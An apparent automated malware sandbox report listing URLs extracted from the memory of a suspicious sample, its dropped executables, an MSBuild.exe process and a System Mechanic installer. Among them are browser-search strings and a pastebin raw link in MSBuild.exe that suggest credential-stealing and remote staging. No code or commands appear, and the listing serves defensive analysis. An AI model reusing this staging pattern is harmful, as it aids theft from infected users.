Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002411000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.00000000027B0000.00000004.00001000.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.00000000027AB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u5qk.3.exe, 00000009.00000003.2489838469.0000000002839000.00000004.00001000.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.00000000027D6000.00000004.00001000.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.0000000002874000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044464664.0000020EEBE00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E803E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://westus2-2.in.applicationinsights.azure.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.0000000002832000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000003.00000002.1994802884.0000000003DD9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.0000000003979000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u5qk.0.exe, u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u5qk.0.exe, 00000001.00000002.2562843633.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Ptr
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/X
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u5qk.3.exe, 00000009.00000003.2489838469.00000000027F4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80381000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)5
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: MSBuild.exe, 00000012.00000002.2537639959.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 00000012.00000002.2537639959.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/Ptr
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/p
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/Ptr
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/p
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB461000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3020284753.0000020EE90C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLins
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/X
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/p
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
